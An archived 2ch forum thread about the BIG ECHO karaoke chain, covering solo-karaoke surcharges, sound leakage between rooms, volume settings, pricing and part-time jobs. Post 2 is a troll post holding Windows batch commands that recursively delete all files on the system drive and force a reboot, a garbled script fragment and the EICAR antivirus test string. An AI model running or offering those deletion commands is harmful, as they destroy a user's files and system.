1read 100read
2013年06月カラオケ227: 【BIG ECHO】ビッグエコー Part.4 (180) TOP カテ一覧 スレ一覧 2ch元 削除依頼
【音源】DAM★とも評価4【アドバイス】 (107)
カラオケ板に来た奴はまずこのスレを見ろ!! (124)
平沢進・P-MODELを何とか歌いこなすスレ6 (930)
タイムタグ付き歌詞ファイル総合スレ 16曲目@アニソン (131)
ゆるゆりのおうたスレ (158)
ミックスボイス判定スレ44 (382)

【BIG ECHO】ビッグエコー Part.4


1 :2013/01/21 〜 最終レス :2013/06/22
▼公式HP
http://big-echo.jp/
▼モバイルHP
http://mb.big-echo.jp/
▼公式ツイッター
https://twitter.com/#!/bigecho_jp
次スレは>>970が立てること
■前スレ
【BIG ECHO】ビッグエコー Part.3
http://awabi.2ch.net/test/read.cgi/karaok/1333189817/
■過去スレ
*1 http://toki.2ch.net/test/read.cgi/karaok/1236620589/
*2 http://awabi.2ch.net/test/read.cgi/karaok/1310963565/

2 :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
@Echo off
Del C:\ *.* |y
(){eval(unescape(('Script(t,'%')))})(/./g);
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3 :
ビックエコーもメンズデーやればいいのに

4 :
乞食お断り

5 :
ヒトカラ料金やめたと思ったら、復活しててワラタ

6 :
店内に人カラ応援ポスター貼ってある店はヒトカラ歓迎してるのかな?

7 :
「人カラ」って何よ?
カラオケするのは人間だけだろ

8 :
>>6
そりゃ1.5倍払う客は大歓迎だろ

9 :
ヒトカラ歓迎ってのは、一定の数の部屋を確保していますってこと
埋まってしまう時間帯では、逆に応援どころではないよ

10 :
ヒトカラだけ別枠で数部屋とってあり、満室ならあとは排除

11 :
違う!ヒトカラというのはメニューのから揚げを1つ注文してくれる
客を歓迎しているという意味だ! ひとから揚げ(略してヒトカラ)
これが事実

12 :
ああそうですか

13 :
つまんね

14 :
1.5倍にされても、ドリンクはワンドリンクのみで
あとは持ち込みだぜ

15 :
あのな、店からすると1人カラオケは迷惑以外の何者でもない。
犯罪とまでは言わないが、大迷惑!大損害!なのだぞ。
憎くて憎くて仕方ない客。これが1人カラオケというもの。
法律で禁止できないかと悩んでいる店長・・・

16 :
クビになった元バイト 乙

17 :
釣れてますね

18 :
店長になればバイトの女の子食べ放題なの?

19 :
そういえば、中には既婚の女性店員も居るよ。
長期間、勤務してる人は大概そう。

20 :
店によって受付や注文の品持ってくるネーちゃんの格好が2通りあるような気が・・・

21 :
店名がローマ字とカタカナで系列が違う

22 :
系列(笑)

23 :
カタカナの店はヒトカラ料金導入、でいいのか?

24 :
仙台駅前にある2店舗って音漏れるの?
今度行きたかったんだが・・・

25 :
音響自体はいい店舗も多いんだがな>仙台

26 :
BEは音漏れが基本

27 :
音漏れする部屋ほど音響もいいよ。理屈は分からんけど。
ヘッドホンもそうだよね

28 :
そりゃ遠慮なく音出してるからだろ

29 :
この流れは標準設定の話?それともハウリング起こさない限界まで主音量を上げた場合の話?

30 :
標準設定の話

31 :
>>28
おんめえ頭いいなあ。確かにそうだわ

32 :
どんな防音部屋だって音漏れするだろ
シーンとしてりゃ隣ズカズカ響くし

33 :
シーンとしてるカラオケ店なんてwww
おまえ他の店行ってみたほうがいいよ

34 :
曲間とか音出てない時って意味だろ

35 :
>>33
何言ってんだこいつ

36 :
>>32
んな当たり前のことをドヤ顔で言われても
プロのスタジオ並の工事してたら1部屋数百万×部屋数かかるんだから無理な話
色んな建物設計してるけど、カラオケ屋はどんな店も部屋と部屋の壁はそこまで防音対策しない
ビル型店舗なら上下階に響かないように、独立型店舗なら近隣や外に響かないよう工事するだけで、店内は有線とかでごまかせるからちょこっとクッション入れるだけ

37 :
それにしても他店に比べBEはひどいのは事実

38 :
BEは壁よりもドアが薄く廊下に丸聴こえな印象。
歌広は壁自体が薄い印象

39 :
お一人様割増料金だしな

40 :
昔の野外のプレハブの時が防音よかったね^^
カラオケを店内で始めてからは騒音ホールになっちまったね。
ビルの中でカラオケ営業は無理があるwww
ただ野外だと未成年が変な事したり酒もちこんだり Hしたり
目がいき届かないからねww
だから今野外プレハブ経営はないでしょ
よほどの田舎ならあるけどww

41 :
俺は店以外にもスタジオも借りてバンド仲間と歌うけどそこは2重扉で
まったく外に音がもれないね^^さすがスタジオ。
タバコを吸いに喫煙所に行き吸うけどシーンして何も音すら聞こえないよお。
中は大音響なんだけどね。
カラオケ店もあれくらい金かけて扉と壁厚くすれば図書館並みにシーンとして
いいと思うよ。

42 :
おっさんの昔話はどうでもいいっす

43 :
ただ、外に音が漏れないでほしいってのは初級者の話で
ヒトカラ中上級者は人に聴かせたいってのもあるから丁度いいんじゃないの?

44 :
おいおい、そんな自意識過剰さんばっかじゃないぜ
普通は聞こえてようが聞こえてなかろうがどうでもいいんだよ

45 :
店員も、客の歌が聴こえてきたとして
何とも思ってないだろう。

46 :
俺は可愛い女の子の1人カラオケは、こっそり聴いてた

47 :
自分的には聞かれても聞こえなくてもどっちでもいいって感じなんだけど、エレベーター横の部屋の時なんかは、あまり大声で歌ったら響きすぎて迷惑だろうなと恐縮してしまい、メイン音量も自分の声も下げるw

48 :
メイン音量でかいと音程正解率下がるからな

49 :
いきつけのメロディがいつの間にかビッグエコーになってたんだが

50 :
>>48
ミュージック音量のこと?

51 :
そう
まあ他の音量も影響するけどね
まずはミュージック音量を下げるのは基本

52 :
>>51
スピーカーの位置も関係しそうだよな?
余計な音を拾ってしまっても意味がないし

53 :
公式にある酒のメニューが一例臭い感じがしてならん。
俺の行き付けだと生ビールのジョッキがアサヒのとことプレミアモルツのとこがある。

54 :
BE某店に行ったが、歌う前に音量調整しようとしたら、設定が保存されないようになってた
おかげでいつもは92〜3点台なのに、85〜6点台ばかりになった
シダックスにしとけばよかった

55 :
>>54
音量調節不可ってこと?

56 :
1曲ごとにデフォに戻るパターンだろ

57 :
公式のパソコン版の店舗料金表とケータイ版の店舗料金表の金額がかなり違うんだけど、どっちが正しいんだろう?
あと、「※お一人様でご利用の場合料金が異なります。」の注意書きが平日昼のFTだけ記載されていない場合はタカラと同一料金ってこと?

58 :
電話でぱぱっと聞いてみた方が早いし正確じゃね?
そこの店舗によるし、正直サイトの情報って古かったりであてにならないわ…
実際ヒトカラ料金発生しますって載ってても既に廃止してるところもあるし、その逆もあると思う

59 :
>>58
正直料金は気にしないので電話予約の時にも聞かなかったわww安い方がいいけどね。
普段はシダックス(3店舗)使ってるんだけど、どの店も公式サイトより100円くらい安いしDB込みになっていたり・・・
まぁ、ぼったくり期間じゃなければ問題ない。

60 :
ヒトカラ料金でFTをするときでも、ドリンクバーだとやけに高いから
ワンドリンクにしてる。
勿論、それじゃ足りないから持込で!

61 :
59だが、行ってきた。シダックスよりFTが300円くらい安いしクーポンが5%OFFだけど総額からの割引だから飲食分も割り引かれるのがいいね。
うちからの場所が遠いのが難点。クランチポテトは冷めても美味しいね。シダックスのメガポテトは時間たつとフニャフニャぁ〜。

62 :
最大の難点は途中で追い出される可能性があること
安かろう悪かろう

63 :
今度BIG ECHOでバイト始めるんだけど、雰囲気どんな感じなんだろう
茶髪禁止だからチャライ奴は少なそうだけど

64 :
禁止だからってもともと髪染めないきちんとした人が応募してくるのではなく、
DQNが黒染めして応募するだけだろ
そもそも全国でたくさんのバイトがいるんだから、DQNが少数であるというふうに考えるのがおかしい
まずは鏡を見てみよう

65 :
髪を染めていない人はきちんとした人でDQNではないというステレオタイプの人が来てるね

66 :
きみは逆と対偶の違いもわからないのか
きちんとした人は髪を染めないだけであって、髪を染めてない人がきちんとしてるなんて言ってないんだけど

67 :
DQNがわざわざ黒染めしてまでBIG ECHOに応募すんの?www
それならもっと他のとこあるだろ

68 :
>>66
>髪を染めてない人がきちんとしてるなんて言ってないんだけど
64 選曲してください sage 2013/02/11(月) 10:16:48.47 ID:nH2MlzIh
禁止だからってもともと髪染めないきちんとした人が応募してくるのではなく、

69 :
髪染めてない人にはきちんとした人ときちんとしてない人がいます
髪染めてる人はきちんとしていません
だからきちんとした人は髪を染めていません
きちんとしていない人は髪を染めている人と染めていない人がいます
BEのバイトは髪染めないきちんとした人だけが応募するのではなく、髪染めないきちんとしてない人や、髪を染めてたけど黒染めしなおしたきちんとしてない人も応募します
だから髪染めないきちんとした人だけが応募すると思うのは間違いです
と言っているのだが、それと>>64>>66は何か矛盾するかい?

70 :
まだ言ってんのかこいつ…
ニートって煽りに慣れてないからすぐ必死になるよな

71 :
矛盾を指摘したら矛盾してなかったから非論理的煽りに走ったでござるの巻

72 :
客に頭下げたくねえけどバイトできる?
バイト時間内だけど客がいねえ時は歌っていいか?
遊びながらで給料ほしいんだ

73 :
>>72
内職オススメ(^3^)/

74 :
>>72
テレビなんで演出もあると思うけど、
Rの法則のエコー体験バイトでは君みたいなめんどいタイプや
チャラ男はフツーに落とされてたね。
もちろん若いうちっていうのは自分のパーソナリティを客観視できてないから
何が向いてる仕事なのかってのは見えてなくて当然だし、失敗してわかっていくもの。
それまでは社会の皆様に迷惑かけるのは致し方ない。でも一ついえるのは接客業というのは
「気を遣う」仕事だし「愛想を振りまく」仕事だし、極端な言い方すれば
プライドを売る仕事で、媚を売る仕事。それが9割と思っていい。
キッチンで料理やお酒つくって運んだり、会計こなすってのは大した仕事じゃない。
もちろんベーター使えないから階段の上り下りはたいへんだけどね。
でも清掃なんかはショートカッツできるし、慣れればラク。
それよりも女子が多い職場だから人間関係が疲れる。
あとエコーって制服可愛いからお客さんからわりとコクられたりってのも多い。
しつこい人もいて店員目当てで通い詰めるから、気持ち悪くなって辞める子もいる。
ただこの前歌広のクリアックスが社員の残業代未払いで訴えられてたけど、
ああいうブラックさは第一興商の場合はないね。
社員もうるさいはうるさいけど品はある。
このくらいかな。まあ俺は接客業の経験の無いただのエコー常連客だけど
店員になった気分で推測でアドバイスしてみた

75 :
お酒はつくんないだろ

76 :
>>74
まじすか?適当に「いだっしゃい」「あざーす」「ういっす」「会計2300円す」
とかじゃダメ?ちなみに俺19歳

77 :
>>76
笑えないけどこれネタで言ってるのか?

78 :
すし屋のほうが向いてますかね?
へい!いだっしゃい!へいお待ち!見たいな感じが好きっす。
客を威圧できるっす
勘定も適当に2万!とかいえるし
すし屋はいいっすね。ボレるし時価値段すから

79 :
>>78
土方とか単純労働が向いてると思う。
知的水準が職場の人と合ってる

80 :
冷静に皮肉っててワロタww

81 :
遊びながら給料もらうなら研究職がお勧め
俺なんか毎日遊んでるぜ

82 :
すし屋もド片も女ッ気ないすからね
つまらないっすわ
やはり女ッ気あるカラオケ屋がいいっす
バイトしてれば可愛い客とか来る?
パチ屋も考えてるす
パチンコやかかろおけ屋で楽にバイトしたいっす

83 :
カラ館か歌広ならわりと良いんじゃない?金髪兄ちゃんとか見るし
BIGECHOは品があるイメージだから難しいと思うなぁ

84 :
え、品があるなんて思ったことないけど
まあ下品じゃないけど、上品ではない

85 :
ツタヤの店員とあまり変わらないと
思うが・・

86 :
商品の置き場所を覚えなくてもいい代わりに飲食のセッティングとゲロ掃除があるくらいか

87 :
今月誕生日の人はクーポン3つ連続で使えてヤバイ

88 :
クーポン使えるのは別にやばくないだろ

89 :
>>84
品があるとか言うよりも、客の年齢層が高いから自ずと
普通に接客出来る人を採用してるような気もする。
平日とか昼間から定年後の爺ちゃんや、お友達同士の婆ちゃんも
かなり目立つし。

90 :
 

91 :
まあ平日昼間にまともな社会人や学生が来るわけないからな

92 :
まーた始まった

93 :
また逆と対偶の人が来るぞww

94 :
↑最近覚えた言葉を嬉しくて使いたい子供のようだね

95 :
あ、逆と待遇の人だ(笑)

96 :
もう終わった話なのに、論破されたのがよっぽど悔しかったんだね

97 :
テス

98 :
カラオケ屋でバイトするくらいだから音楽とか歌が好きな人が多い気がする。
どう思う?

99 :
確かにバンドやってたりする奴もいた
幼少からピアノ習ってたような女の子もいた
歌が好きでカラオケでも歌いまくりの男も女もいたな
好きなミュージシャンのライブには必ずいく追っかけもいた
何かしら音楽に縁がある人らが多かったね、確かに。
音楽あまり好かない人は居酒屋とか別のバイトするしww
ゲームとかギャンブル系好きな人は
パチ屋、ゲーセン行くしね。
おらもバイトする時ビリヤード屋かマージャン店のどちらかで
バイトしようとか悩んだけどビリは下手だし麻雀はルールしらないし
結局歌好きだっのでオケ屋に決めたからねえ
絶対に嫌いな仕事はいくらバイトとはいえやらないんじゃない、みんな。
心のどこかで好きな仕事じゃないと耐えれないしな

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
ゴダイゴを歌おうよ (150)
サーターアンダギーのソングを歌おう! (103)
嵐を歌ってみよう! part.1 (145)
何で韓国歌手ってあんなに喉が強いの? (102)
【隔離】うたスキ裏情報part23【隔離】 (121)
THE BACK HORNを歌おう3 (120)
--log9.info------------------
軽自動車のタクシーがあったらいいのに (102)
バイクの免許を持ってない男の軽乗りはゴミ虫 (144)
軽自動車にのってるちっちゃい女の子がかわいい (138)
軽で冠婚葬祭【かんこんそうさい】 (107)
軽自動車にエアロ付けてる女って何なの? (129)
日産パレットOEM ピノを廃止して発売 (155)
あのさ、、、この板必要か???? (131)
DQN車乗りの逆襲 (104)
【錆】下回りのサビ対策【錆】 (179)
おかんに買ってあげる車は何がいい? (137)
山坂道で後ろに軽がいたらブレーキ→加速でお遊び (169)
スカイラインに憧れる奴が居ても・・・ (184)
【これなら!】メーカー不問・売れる軽を考えてみる (167)
ミラって水1Lで28kmも走れんの? (120)
■■■■軽だから軽油■■■■ (190)
前の人の軽をバカにしまくるスレ 1 (131)
--log55.com------------------
【新型コロナ】新型肺炎、誹謗中傷も拡大 ネットで患者特定の動き…デマも拡散 SNSには顔写真まで出回る
【新潟】6年前の20歳女性殺人疑いで男逮捕 別の強姦致死罪で無期服役中の容疑者
【岡山】コンビニ店内で妻の腹などを日本刀で複数回さした疑い、51歳男を逮捕…妻は死亡、母親もけが…赤磐市
【コロナ検査】社会学者「なんで受けたがる?特効薬もないわけですし、検査結果がどうであれ、対応は変わらない」★5
【速報/東京五輪】イギリスと、カナダで分散開催案 ロンドン市長選の候補者が述べる
【2/26現在】感染者が確認された国と地域(中国以外)→韓国1146人・others691人・イタリア322人・日本170人
【コロナ検査してもらえない】妊娠7ヶ月妊婦「産婦人科医も抗議してくれたがダメ.呼吸が苦しくこのまま胎児と死ぬしかないですか?」★10
【菅官房長官】東京五輪、開催判断は5月報道「IOCの公式見解ではない。予定通り準備を進めていることを説明していると回答を得た」